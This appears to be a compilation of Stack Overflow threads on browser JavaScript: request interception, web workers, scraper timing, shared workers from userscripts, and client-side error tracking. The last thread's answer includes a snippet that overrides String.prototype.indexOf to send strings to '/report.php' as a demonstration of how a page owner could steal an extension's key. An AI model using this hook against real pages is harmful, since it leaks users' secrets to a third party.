How to get the resource initiator like Chrome DevTools? - javascript

I am making a JavaScript tracker using CefSharp.
After searching for solutions, I tried using a service worker to intercept http/https requests with code like this, but it didn't work:
navigator.serviceWorker.addEventListener('fetch', event => {
event.respondWith(async function(e) {
var err = new Error();
ccw.hhh(err.stack); // print call-stack info using my own js-object
}());
});
Since I don't own the web pages, I can't use code like navigator.serviceWorker.register('sw.js').
Also, the approach described at https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/Intercept_HTTP_requests does not work in CefSharp.
And the IRequest passed to IResourceHandler::Open(IRequest ...) by CefSharp does not contain call stack or initiator information.
How can I get a request's call stack information in CefSharp?
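One page-side approach that does not depend on CefSharp's request handlers is to wrap the request APIs before page scripts run and capture `new Error().stack` at call time. The sketch below is a minimal illustration under that assumption. `wrapWithStack` and the `report` callback are hypothetical names; `report` stands in for a bound object method such as `ccw.hhh` from the question, and how the script gets injected early enough is left out.

```javascript
// Wrap owner[name] so every call first reports the caller's stack trace.
// `wrapWithStack` and `report` are illustrative names, not CefSharp APIs.
function wrapWithStack(owner, name, report) {
  const original = owner[name];
  owner[name] = function (...args) {
    // The stack captured here includes the frames that initiated the call.
    const stack = new Error("initiator of " + name).stack;
    report({ api: name, target: String(args[0]), stack });
    return original.apply(this, args);
  };
  return original; // returned so the caller can restore it later
}

// Demo with a stand-in object; in a page you would pass `window` and "fetch".
const fakeWindow = { fetch: (url) => "response for " + url };
const seen = [];
wrapWithStack(fakeWindow, "fetch", (entry) => seen.push(entry));

function loadData() {
  return fakeWindow.fetch("/api/items");
}
const result = loadData();
console.log(result, seen[0].stack.includes("loadData"));
```

The same wrapper could probably be applied to `XMLHttpRequest.prototype.open`. Requests started by markup (for example `img` or `script` tags) never pass through these functions, so this only covers script-initiated requests.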

Related

Chrome Extension: Modifying a built in function for all webworkers

So here's a bit of background. I need to intercept the return data from a fetch request. I already know how to do that. By injecting this code in the webpage I can read the response body of a fetch. Like this:
var proxyFetch = fetch;
window.fetch = async function () {
var response = proxyFetch(...arguments);
// a lot of other code as well
return response;
}
The problem I'm having is that I can't modify the fetch function for any web workers. I don't have access to their 'this' context. My best bet is something to do with WorkerGlobalScope but I don't know if that object can do what I want.
My second idea was to do something like this before the page loads:
window.Worker = class extends window.Worker{
constructor(){
// Take the url they passed into webworker.
// Fetch the url to get the raw javascript.
// Append my javascript to it.
// Turn it into a blob url
// Now I have my javascript running in every web worker
//
// The problem here is that we are not allowed to use asynchronous calls in the constructor.
// I am stumped on this option as well.
}
}
I've looked into WebRequest but they don't allow us to look at the response body of network requests.
I played around with this a lot to see if I could modify the globalThis or WorkerGlobalScope for every webworker on the page so I can modify the fetch but I could not find a way.
var code = "postMessage('hello world');"
var blob = new Blob([code], { type: 'application/javascript' });
var url = URL.createObjectURL(blob);
var worker = new Worker(url);
worker.onmessage = function(e) {
console.log(e.data);
};
What you are trying to achieve is meant to be done by a Service Worker.
They work as proxy between the app and server. You can control whether the request is even made or what it returns.
Additionally you can send messages between your worker and the service worker with the postMessage interface.
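For the second idea in the question, the asynchronous fetch inside the constructor can possibly be avoided: the replacement worker script only has to run the patch first and then pull in the original script with `importScripts()`, which is synchronous inside classic workers. The following is a rough sketch under that assumption. `buildWorkerBootstrap` and `patchSource` are hypothetical names, module workers (`{ type: 'module' }`) are not covered, and a cross-origin worker script or a restrictive Content-Security-Policy may still block it.

```javascript
// Build the source of a bootstrap worker script: patch first, then load the
// original script synchronously via importScripts().
function buildWorkerBootstrap(patchSource, scriptUrl, baseUrl) {
  // Relative URLs would resolve against the blob URL, so make them absolute.
  const absoluteUrl = new URL(scriptUrl, baseUrl).href;
  return patchSource + "\n;importScripts(" + JSON.stringify(absoluteUrl) + ");\n";
}

// Hypothetical patch: wrap fetch inside the worker's global scope.
const patchSource = `
const originalFetch = self.fetch;
self.fetch = function (...args) {
  // inspect args or the returned promise here
  return originalFetch.apply(this, args);
};`;

const source = buildWorkerBootstrap(patchSource, "worker.js", "https://example.com/app/");
console.log(source);

// In a page, before any other script runs (not executed here):
// const NativeWorker = window.Worker;
// window.Worker = class extends NativeWorker {
//   constructor(url, options) {
//     const src = buildWorkerBootstrap(patchSource, String(url), location.href);
//     const blob = new Blob([src], { type: "application/javascript" });
//     super(URL.createObjectURL(blob), options);
//   }
// };
```

Inside such a worker, `self.location` is the blob URL rather than the original script URL, which can break worker code that relies on it.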

Apify web scraper task not stable. Getting different results between runs minutes apart

I'm building a very simple scraper to get the 'now playing' info from an online radio station I like to listen to.
It's stored in a simple p element on their site:
Now using the standard apify/web-scraper I run into a strange issue. The scraping sometimes works, but sometimes doesn't using this code:
async function pageFunction(context) {
const { request, log, jQuery } = context;
const $ = jQuery;
const nowPlaying = $('p.js-playing-now').text();
return {
nowPlaying
};
}
If the scraper works I get this result:
[{"nowPlaying": "Hangover Hotline - hosted by Lamebrane"}]
But if it doesn't I get this:
[{"nowPlaying": ""}]
And there is only a 5 minute difference between the two scrapes. The website doesn't change, the data is always presented in the same way. I tried checking all the boxes to circumvent security and different mixes of options (Use Chrome, Use Stealth, Ignore SSL errors, Ignore CORS and CSP) but that doesn't seem to fix it unfortunately.
Any suggestions on how I can get this scraping task to consistently return the data I need?
It would be great if you could attach the URL; it would help me find the problem.
From the information you provided, I guess that the data you want is loaded asynchronously. You can use the context.waitFor() function.
async function pageFunction(context) {
const { request, log, jQuery } = context;
const $ = jQuery;
await context.waitFor(() => !!$('p.js-playing-now').text());
const nowPlaying = $('p.js-playing-now').text();
return {
nowPlaying
};
}
You pass a function to waitFor, and it waits until that function returns a truthy value. You can check the docs.
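To make the waiting behaviour concrete, here is a small stand-alone polling helper. It is not Apify's implementation, only a sketch of the general idea; the names `waitFor`, `timeoutMs` and `pollIntervalMs` are chosen for this example.

```javascript
// Poll `predicate` until it returns a truthy value or the timeout elapses.
// `waitFor`, `timeoutMs` and `pollIntervalMs` are names chosen for this sketch.
async function waitFor(predicate, { timeoutMs = 5000, pollIntervalMs = 50 } = {}) {
  const deadline = Date.now() + timeoutMs;
  for (;;) {
    const value = await predicate();
    if (value) return value;
    if (Date.now() >= deadline) {
      throw new Error("waitFor timed out after " + timeoutMs + " ms");
    }
    await new Promise((resolve) => setTimeout(resolve, pollIntervalMs));
  }
}

// Demo: the "now playing" text shows up 120 ms after start.
let nowPlaying = "";
setTimeout(() => { nowPlaying = "Hangover Hotline - hosted by Lamebrane"; }, 120);

const demo = waitFor(() => nowPlaying, { timeoutMs: 2000, pollIntervalMs: 20 })
  .then((text) => { console.log(text); return text; });
```

A timeout is worth keeping in any such loop: if the element never gets its text, the scrape fails with a clear error instead of hanging or silently returning an empty string.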

How can I load a shared web worker with a user-script?

I want to load a shared worker with a user-script. The problem is the user-script is free, and has no business model for hosting a file - nor would I want to use a server, even a free one, to host one tiny file. Regardless, I tried it and I (of course) get a same origin policy error:
Uncaught SecurityError: Failed to construct 'SharedWorker': Script at
'https://cdn.rawgit.com/viziionary/Nacho-Bot/master/webworker.js'
cannot be accessed from origin 'http://stackoverflow.com'.
There's another way to load a web worker by converting the worker function to a string and then into a Blob and loading that as the worker but I tried that too:
var sharedWorkers = {};
var startSharedWorker = function(workerFunc){
var funcString = workerFunc.toString();
var index = funcString.indexOf('{');
var funcStringClean = funcString.substring(index + 1, funcString.length - 1);
var blob = new Blob([funcStringClean], { type: "text/javascript" });
sharedWorkers.google = new SharedWorker(window.URL.createObjectURL(blob));
sharedWorkers.google.port.start();
};
And that doesn't work either. Why? Because shared workers are shared based on the location their worker file is loaded from. Since createObjectURL generates a unique file name for each use, the workers will never have the same URL and will therefore never be shared.
How can I solve this problem?
Note: I tried asking about specific solutions, but at this point I think
the best I can do is ask in a more broad manner for any
solution to the problem, since all of my attempted solutions seem
fundamentally impossible due to same origin policies or the way
URL.createObjectURL works (from the specs, it seems impossible to
alter the resulting file URL).
That being said, if my question can somehow be improved or clarified, please leave a comment.
You can use fetch() and response.blob() to get a Blob of type application/javascript, create a Blob URL from it with URL.createObjectURL(), and pass that URL to SharedWorker(). Then use window.open() and the load event of the newly opened window to assign the same SharedWorker instance to the new window, and attach a message event handler to the worker's port there.
The JavaScript below was tried in the console at "How to clear the contents of an iFrame from another iFrame"; the current question's URL is loaded in a new tab, and the message sent from the opening window through worker.port.postMessage() is logged in the new tab's console.
The opening window should likewise log a message event when the newly opened window posts one using worker.port.postMessage(/* message */).
window.worker = void 0, window.so = void 0;
fetch("https://cdn.rawgit.com/viziionary/Nacho-Bot/master/webworker.js")
.then(response => response.blob())
.then(script => {
console.log(script);
var url = URL.createObjectURL(script);
window.worker = new SharedWorker(url);
console.log(worker);
worker.port.addEventListener("message", (e) => console.log(e.data));
worker.port.start();
window.so = window.open("https://stackoverflow.com/questions/"
+ "38810002/"
+ "how-can-i-load-a-shared-web-worker-"
+ "with-a-user-script", "_blank");
so.addEventListener("load", () => {
so.worker = worker;
so.console.log(so.worker);
so.worker.port.addEventListener("message", (e) => so.console.log(e.data));
so.worker.port.start();
so.worker.port.postMessage("hi from " + so.location.href);
});
so.addEventListener("load", () => {
worker.port.postMessage("hello from " + location.href)
})
});
At the console in either tab you can then use, for example, worker.port.postMessage("hello, again") at "How to clear the contents of an iFrame from another iFrame", or worker.port.postMessage("hi, again") in the new window at the current URL, "How can I load a shared web worker with a user-script?". With message event handlers attached in each window, the two windows can communicate through the original SharedWorker created at the initial URL.
Precondition
As you've researched and as it has been mentioned in comments,
SharedWorker's URL is subject to the Same Origin Policy.
According to this question there's no CORS support for Worker's URL.
According to this issue GM_worker support is now a WONT_FIX, and
seems close enough to impossible to implement due to changes in Firefox.
There's also a note that sandboxed Worker (as opposed to
unsafeWindow.Worker) doesn't work either.
Design
What I suppose you want to achieve is an @include * userscript that will collect some statistics or create some global UI that will appear everywhere. And thus you want to have a worker to maintain some state or statistic aggregates at runtime (which will be easy to access from every instance of the userscript), and/or you want to do some computation-heavy routine (because otherwise it will slow target sites down).
In the way of any solution
The solution I want to propose is to replace SharedWorker design with an alternative.
If you just want to maintain state in the shared worker, use Greasemonkey storage (GM_setValue and friends). It's shared among all userscript instances (SQLite behind the scenes).
If you want to do a computation-heavy task, do it in unsafeWindow.Worker and put the result back in Greasemonkey storage.
If you want to do some background computation that must be run by only a single instance, there are a number of "inter-window" synchronisation libraries (mostly they use localStorage, but Greasemonkey's storage has the same API, so it shouldn't be hard to write an adapter for it). Thus you can acquire a lock in one userscript instance and run your routines in it. For example, IWC or ByTheWay (likely used here on Stack Exchange; post about it).
Other way
I'm not sure but there may be some ingenious response spoofing, made from ServiceWorker to make SharedWorker work as you would like to. Starting point is in this answer's edit.
I am pretty sure you want a different answer, but sadly this is what it boils down to.
Browsers implement same-origin-policies to protect internet users, and although your intentions are clean, no legit browser allows you to change the origin of a sharedWorker.
All browsing contexts in a sharedWorker must share the exact same origin
host
protocol
port
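The three parts listed above can be compared directly with the standard `URL` class. This is only an illustration of the rule; `sameOrigin` is a helper name made up for this sketch, not a browser API.

```javascript
// Two URLs share an origin only if protocol, host and port all match.
function sameOrigin(a, b) {
  const urlA = new URL(a);
  const urlB = new URL(b);
  return (
    urlA.protocol === urlB.protocol &&
    urlA.hostname === urlB.hostname &&
    urlA.port === urlB.port // default ports are normalized to ""
  );
}

// Same protocol, host and port: true
console.log(sameOrigin("https://stackoverflow.com/questions", "https://stackoverflow.com/tags"));
// The page and worker script from the error message in the question: false
console.log(sameOrigin("http://stackoverflow.com/", "https://cdn.rawgit.com/viziionary/Nacho-Bot/master/webworker.js"));
// Same host but a different port: false
console.log(sameOrigin("https://example.com/", "https://example.com:8443/"));
```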
You cannot hack around this issue. I've tried using iframes in addition to your methods, but none will work.
Maybe you can put your JavaScript file on GitHub and use their raw. service to get the file; this way you can have it running without much effort.
Update
I was reading chrome updates and I remembered you asking about this.
Cross-origin service workers arrived on chrome!
To do this, add the following to the install event for the SW:
self.addEventListener('install', event => {
event.registerForeignFetch({
scopes: [self.registration.scope], // or some sub-scope
origins: ['*'] // or ['https://example.com']
});
});
Some other considerations are needed as well; check it out:
Full link: https://developers.google.com/web/updates/2016/09/foreign-fetch?hl=en?utm_campaign=devshow_series_crossoriginserviceworkers_092316&utm_source=gdev&utm_medium=yt-desc
Yes you can! (here's how):
I don't know if it's because something has changed in the four years since this question was asked, but it is entirely possible to do exactly what the question is asking for. It's not even particularly difficult. The trick is to initialize the shared worker from a data-url that contains its code directly, rather than from a createObjectURL(blob).
This is probably most easily demonstrated by example, so here's a little userscript for stackoverflow.com that uses a shared worker to assign each stackoverflow window a unique ID number, displayed in the tab title. Note that the shared-worker code is directly included as a template string (i.e. between backtick quotes):
// ==UserScript==
// @name stackoverflow userscript shared worker example
// @namespace stackoverflow test code
// @version 1.0
// @description Demonstrate the use of shared workers created in userscript
// @icon https://stackoverflow.com/favicon.ico
// @include http*://stackoverflow.com/*
// @run-at document-start
// ==/UserScript==
(function() {
"use strict";
var port = (new SharedWorker('data:text/javascript;base64,' + btoa(
// =======================================================================================================================
// ================================================= shared worker code: =================================================
// =======================================================================================================================
// This very simple shared worker merely provides each window with a unique ID number, to be displayed in the title
`
var lastID = 0;
onconnect = function(e)
{
var port = e.source;
port.onmessage = handleMessage;
port.postMessage(["setID",++lastID]);
}
function handleMessage(e) { console.log("Message Received by shared worker: ",e.data); }
`
// =======================================================================================================================
// =======================================================================================================================
))).port;
port.onmessage = function(e)
{
var data = e.data, msg = data[0];
switch (msg)
{
case "setID": document.title = "#"+data[1]+": "+document.title; break;
}
}
})();
I can confirm that this is working on Firefox v79 + Tampermonkey v4.11.6117.
There are a few minor caveats:
Firstly, it might be that the page your userscript is targeting is served with a Content-Security-Policy header that explicitly restricts the sources for scripts or worker scripts (script-src or worker-src policies). In that case, the data-url with your script's content will probably be blocked, and offhand I can't think of a way around that, unless some future GM_ function gets added to allow a userscript to override a page's CSP or change its HTTP headers, or unless the user runs their browser with an extension or browser settings to disable CSP (see e.g. Disable same origin policy in Chrome).
Secondly, userscripts can be defined to run on multiple domains, e.g. you might run the same userscript on https://amazon.com and https://amazon.co.uk. But even when created by this single userscript, shared workers obey the same-origin policy, so there should be a different instance of the shared worker that gets created for all the .com windows vs for all the .co.uk windows. Be aware of this!
Finally, some browsers may impose a size limit on how long data-urls can be, restricting the maximum length of code for the shared worker. Even if not restricted, the conversion of all the code for long, complicated shared worker to base64 and back on every window load is quite inefficient. As is the indexing of shared workers by extremely long URLs (since you connect to an existing shared worker based on matching its exact URL). So what you can do is (a) start with an initially very minimal shared worker, then use eval() to add the real (potentially much longer) code to it, in response to something like an "InitWorkerRequired" message passed to the first window that opens the worker, and (b) For added efficiency, pre-calculate the base-64 string containing the initial minimal shared-worker bootstrap code.
Here's a modified version of the above example with these two wrinkles added in (also tested and confirmed to work), that runs on both stackoverflow.com and en.wikipedia.org (just so you can verify that the different domains do indeed use separate shared worker instances):
// ==UserScript==
// @name stackoverflow & wikipedia userscript shared worker example
// @namespace stackoverflow test code
// @version 2.0
// @description Demonstrate the use of shared workers created in userscript, with code injection after creation
// @icon https://stackoverflow.com/favicon.ico
// @include http*://stackoverflow.com/*
// @include http*://en.wikipedia.org/*
// @run-at document-end
// ==/UserScript==
(function() {
"use strict";
// Minimal bootstrap code used to first create a shared worker (commented out because we actually use a pre-encoded base64 string created from a minified version of this code):
/*
// ==================================================================================================================================
{
let x = [];
onconnect = function(e)
{
var p = e.source;
x.push(e);
p.postMessage(["InitWorkerRequired"]);
p.onmessage = function(e) // Expects only 1 kind of message: the init code. So we don't actually check for any other sort of message, and page script therefore mustn't send any other sort of message until init has been confirmed.
{
(0,eval)(e.data[1]); // (0,eval) is an indirect call to eval(), which therefore executes in global scope (rather than the scope of this function). See http://perfectionkills.com/global-eval-what-are-the-options/ or https://stackoverflow.com/questions/19357978/indirect-eval-call-in-strict-mode
while(e = x.shift()) onconnect(e); // This calls the NEW onconnect function, that the eval() above just (re-)defined. Note that unless windows are opened in very quick succession, x should only have one entry.
}
}
}
// ==================================================================================================================================
*/
// Actual code that we want the shared worker to execute. Can be as long as we like!
// Note that it must replace the onconnect handler defined by the minimal bootstrap worker code.
var workerCode =
// ==================================================================================================================================
`
"use strict"; // NOTE: because this code is evaluated by eval(), the presence of "use strict"; here will cause it to be evaluated in it's own scope just below the global scope, instead of in the global scope directly. Practically this shouldn't matter, though: it's rather like enclosing the whole code in (function(){...})();
var lastID = 0;
onconnect = function(e) // MUST set onconnect here; bootstrap method relies on this!
{
var port = e.source;
port.onmessage = handleMessage;
port.postMessage(["WorkerConnected",++lastID]); // As well as providing a page with its ID, the "WorkerConnected" message indicates to a page that the worker has been initialized, so it may be posted messages other than "InitializeWorkerCode"
}
function handleMessage(e)
{
var data = e.data;
if (data[0]==="InitializeWorkerCode") return; // If two (or more) windows are opened very quickly, "InitWorkerRequired" may get posted to BOTH, and the second response will then arrive at an already-initialized worker, so must check for and ignore it here.
// ...
console.log("Message Received by shared worker: ",e.data); // For this simple example worker, there's actually nothing to do here
}
`;
// ==================================================================================================================================
// Use a base64 string encoding minified version of the minimal bootstrap code in the comments above, i.e.
// btoa('{let x=[];onconnect=function(e){var p=e.source;x.push(e);p.postMessage(["InitWorkerRequired"]);p.onmessage=function(e){(0,eval)(e.data[1]);while(e=x.shift()) onconnect(e);}}}');
// NOTE: If there's any chance the page might be using more than one shared worker based on this "bootstrap" method, insert a comment with some identification or name for the worker into the minified, base64 code, so that different shared workers get unique data-URLs (and hence don't incorrectly share worker instances).
var port = (new SharedWorker('data:text/javascript;base64,e2xldCB4PVtdO29uY29ubmVjdD1mdW5jdGlvbihlKXt2YXIgcD1lLnNvdXJjZTt4LnB1c2goZSk7cC5wb3N0TWVzc2FnZShbIkluaXRXb3JrZXJSZXF1aXJlZCJdKTtwLm9ubWVzc2FnZT1mdW5jdGlvbihlKXsoMCxldmFsKShlLmRhdGFbMV0pO3doaWxlKGU9eC5zaGlmdCgpKSBvbmNvbm5lY3QoZSk7fX19')).port;
port.onmessage = function(e)
{
var data = e.data, msg = data[0];
switch (msg)
{
case "WorkerConnected": document.title = "#"+data[1]+": "+document.title; break;
case "InitWorkerRequired": port.postMessage(["InitializeWorkerCode",workerCode]); break;
}
}
})();
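The note in the bootstrap comments about giving each shared worker its own data URL can be sketched as a small helper. `workerDataUrl` and its `name` parameter are hypothetical names for this example; the idea is simply that identical input yields an identical URL (so windows on one origin share the worker), while a different name yields a different URL.

```javascript
// Build a data: URL for a shared worker. Identical (name, source) pairs give
// identical URLs, so windows on the same origin connect to the same worker.
// `workerDataUrl` and `name` are illustrative; btoa() only accepts Latin-1 text.
function workerDataUrl(source, name) {
  const tagged = "/* worker: " + name + " */\n" + source;
  return "data:text/javascript;base64," + btoa(tagged);
}

const bootstrap = "onconnect = function (e) { e.ports[0].postMessage('ready'); };";
const statsUrl = workerDataUrl(bootstrap, "stats");
const chatUrl = workerDataUrl(bootstrap, "chat");

console.log(statsUrl === workerDataUrl(bootstrap, "stats")); // true
console.log(statsUrl === chatUrl); // false

// In a userscript (not executed here):
// const port = new SharedWorker(statsUrl).port;
```

Computing the URL once and pasting the resulting string into the userscript, as the example above does, avoids re-encoding on every page load.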

How do we track Javascript errors? Do the existing tools actually work?

Today I find the need to track and retrieve JavaScript error stack traces in order to fix the errors.
We are already able to capture all REST calls. The idea is that once an error occurs, its stack trace is posted automatically, together with the saved responses of the REST services, so we can detect, reproduce, and solve problems in an almost identical environment/situation.
As a requirement, we were asked to make a module that can be included without being intrusive. For example:
Including the module that contains the hook logic in one JS file would not be invasive; adding several lines of code to various JS files would be invasive.
The goal is to make a tool that can be included in an already developed system and track error events (like the console does).
I've read about the logic of these trackers:
errorception.com/
trackjs.com/
atatus.com/
airbrake.io/
jslogger.com/
getsentry.com/
muscula.com/
debuggify.net/
raygun.io/home
We need to do something like that, track the error and send it to our server.
As "Dagg Nabbit" says... "It's difficult to get a stack trace from errors that happen "in the wild" right now"...
So there are a lot of paid products, but how do they really work?
In Airbrake they use stacktrace and window.onerror:
window.onerror = function(message, file, line) {
setTimeout(function() {
Hoptoad.notify({
message : message,
stack : '()@' + file + ':' + line
});
}, 100);
return true;
};
But I can't figure out when the stack trace is really used.
At some point, stacktrace, raven.js and other trackers need try / catch.
What happens if we find a way to make a global wrapper?
Can we just call stacktrace and wait for the catch?
How can I send a stack trace to my server when an unexpected error occurs on the client? Any advice or good practices?
It's difficult to get a stack trace from errors that happen "in the wild" right now, because the Error object isn't available to window.onerror.
window.onerror = function(message, file, line) { }
There is also a new error event, but this event doesn't expose the Error object (yet).
window.addEventListener('error', function(errorEvent) { })
Soon, window.onerror will get a fifth parameter containing the Error object, and you can probably use stacktrace.js to grab a stack trace during window.onerror.
<script src="stacktrace.js"></script>
<script>
window.onerror = function(message, file, line, column, error) {
try {
var trace = printStackTrace({e: error}).join('\n');
var url = 'http://yourserver.com/?jserror=' + encodeURIComponent(trace);
var p = new printStackTrace.implementation();
var xhr = p.createXMLHTTPObject();
xhr.open('GET', url, true);
xhr.send(null);
} catch (e) { }
}
</script>
At some point the Error API will probably be standardized, but for now, each implementation is different, so it's probably smart to use something like stacktracejs to grab the stack trace, since doing so requires a separate code path for each browser.
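As a rough illustration of handling both cases (with and without the fifth `error` argument), the handler's arguments can be normalized into one report object before sending. `buildErrorReport` and the `/jserror` endpoint in the comment are assumptions made for this sketch, not part of stacktrace.js or any tracker mentioned here.

```javascript
// Turn the arguments of window.onerror into a plain object that can be sent
// to a server. `buildErrorReport` is a name chosen for this sketch.
function buildErrorReport(message, file, line, column, error) {
  return {
    message: String(message),
    file: file || null,
    line: typeof line === "number" ? line : null,
    column: typeof column === "number" ? column : null,
    // Older browsers do not pass `error`; fall back to a one-frame pseudo stack.
    stack: error && error.stack ? String(error.stack) : "()@" + file + ":" + line,
  };
}

// Browser wiring (not executed here; "/jserror" is a placeholder endpoint):
// window.onerror = function (message, file, line, column, error) {
//   const report = buildErrorReport(message, file, line, column, error);
//   navigator.sendBeacon("/jserror", JSON.stringify(report));
// };

const withError = buildErrorReport("boom", "app.js", 10, 5, new Error("boom"));
const withoutError = buildErrorReport("boom", "app.js", 10);
console.log(withoutError.stack); // ()@app.js:10
```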
I'm the cofounder of TrackJS, mentioned above. You are correct, sometimes getting the stack traces requires a little bit of work. At some level, async functions have to be wrapped in a try/catch block--but we do this automatically!
In TrackJS 2.0+, any function you pass into a callback (addEventListener, setTimeout, etc) will be automatically wrapped in a try/catch. We've found that we can catch nearly everything with this.
For the few things that we might not catch, you can always try/catch it yourself. We provide some helpful wrappers, for example:
function foo() {
// does stuff that might blow up
}
trackJs.watch(foo);
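The general technique of wrapping callbacks in try/catch can be sketched as follows. This is not the TrackJS implementation; `guard`, `patchScheduler` and `report` are hypothetical names, and the demo uses a synchronous stand-in instead of the real `setTimeout`.

```javascript
// Wrap a callback so that any exception is reported with its Error object
// (and therefore its stack) before being rethrown.
// `guard` and `report` are hypothetical names, not the TrackJS API.
function guard(fn, report) {
  return function guarded(...args) {
    try {
      return fn.apply(this, args);
    } catch (error) {
      report(error);
      throw error; // keep the original failure visible
    }
  };
}

// Patch a scheduler-like function so callbacks passed to it are guarded.
function patchScheduler(owner, name, report) {
  const original = owner[name];
  owner[name] = function (callback, ...rest) {
    const wrapped = typeof callback === "function" ? guard(callback, report) : callback;
    return original.call(this, wrapped, ...rest);
  };
}

// Demo with a synchronous stand-in for setTimeout.
const reports = [];
const host = { later: (cb) => cb() };
patchScheduler(host, "later", (error) => reports.push(error));

try {
  host.later(function explode() { throw new Error("blew up"); });
} catch (e) {
  // rethrown after being reported
}
console.log(reports.length, reports[0].message);
```

In a page, the same patch would be applied to `window.setTimeout` and similar entry points. Event listeners need extra care, because `removeEventListener` must be given the wrapped function rather than the original.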
In latest browsers, there is a 5th parameter for error object in window.onerror.
In addEventListener, you can get error object by event.error
// Only Chrome & Opera pass the error object.
window.onerror = function (message, file, line, col, error) {
console.log(message, "from", error.stack);
// You can send data to your server
// sendData(data);
};
// Only Chrome & Opera have an error attribute on the event.
window.addEventListener("error", function (event) {
console.log(event.error.message, "from", event.error.stack);
// You can send data to your server
// sendData(data);
})
You can send data using image tag as follows
function sendData(data) {
var img = new Image(),
src = 'http://yourserver.com/jserror?data=' + encodeURIComponent(JSON.stringify(data));
img.crossOrigin = 'anonymous';
img.onload = function success() {
console.log('success', data);
};
img.onerror = img.onabort = function failure() {
console.error('failure', data);
};
img.src = src;
}
If you are looking for opensource, then you can checkout TraceKit. TraceKit squeezes out as much useful information as possible and normalizes it. You can register a subscriber for error reports:
TraceKit.report.subscribe(function yourLogger(errorReport) {
// sendData(data);
});
However, you have to build a backend to collect the data and a front end to visualize it.
Disclaimer: I am a web developer at https://www.atatus.com/ where you can track all your JavaScript errors and filter errors across various dimensions such as browsers, users, urls, tags etc.
@Da3 You asked about appenlight and stacktraces. Yes it can gather full stacktraces as long as you wrap the exception in try/catch block. Otherwise it will try reading the info from window.onerror which is very limited. This is a browser limitation (which may be fixed in future).

Is it possible for the admin to get the full sourcecode of my js-file if I redirect a Javascript file to a local modified Javascript file?

I created a Google Chrome extension which redirects all requests for a JavaScript file on a website to a modified version of this file on my hard drive.
It works and I do it simplified like this:
... redirectUrl: chrome.extension.getURL("modified.js") ...
Modified.js is the same javascript file except that I modified a line in the code.
I changed something that looks like
var message = mytext.value;
to
var message = aes.encrypt(mytext.value,"mysecretkey");
My question is: can the admin of the website whose JavaScript file I redirect modify his web page so that he can obtain "mysecretkey"? (The admin knows how my extension works and which line is modified, but doesn't know the key used.)
Thanks in advance
Yes, the "admin" can read the source code of your code.
Your method is very insecure. There are two ways to read "mysecretkey".
Let's start with the non-trivial one: get a reference to the source. For example, assume that your aes.encrypt method looks like this:
(function() {
var aes = {encrypt: function(val, key) {
if (key.indexOf('whatever')) {/* ... */}
}};
})();
Then it can be compromised using:
(function(indexOf) {
String.prototype.indexOf = function(term) {
if (term !== 'known') (new Image).src = '/report.php?t=' + term;
return indexOf.apply(this, arguments);
};
})(String.prototype.indexOf);
Many prototype methods result in possible leaking, as well as arguments.callee. If the "admin" wants to break your code, he'll surely be able to achieve this.
The other method is much easier to implement:
var x = new XMLHttpRequest();
x.open('GET', '/possiblymodified.js');
x.onload = function() {
console.log(x.responseText); // Full source code here....
};
x.send();
You could replace the XMLHttpRequest method, but at this point, you're just playing the cat and mouse game. Whenever you think that you've secured your code, the other will find a way to break it (for instance, using the first described method).
Since the admin can control any aspect of the site, they could easily modify aes.encrypt to post the second argument to them and then continue as normal. Therefore your secret key would be immediately revealed.
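The point above can be illustrated with a stand-in object. The real `aes` library is not shown in the question, so the `aes` object below is purely hypothetical; the sketch only shows that whoever controls the page can wrap the function and see its second argument.

```javascript
// Stand-in for the page's crypto helper; the real `aes` object is not shown
// in the question, so this one is purely hypothetical.
const aes = {
  encrypt(value, key) {
    return "encrypted(" + value + ")";
  },
};

// What a page owner could run before the redirected script executes:
const leaked = [];
const originalEncrypt = aes.encrypt;
aes.encrypt = function (value, key) {
  leaked.push(key); // a real page could send this to its own server
  return originalEncrypt.apply(this, arguments);
};

// The line from the modified script, unchanged:
const message = aes.encrypt("hello", "mysecretkey");
console.log(message, leaked);
```

The modified script behaves exactly as before, so nothing on the extension's side would reveal that the key has been observed.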
No. The Web administrator would have no way of seeing what you set it to before it could get sent to the server where he could see it.
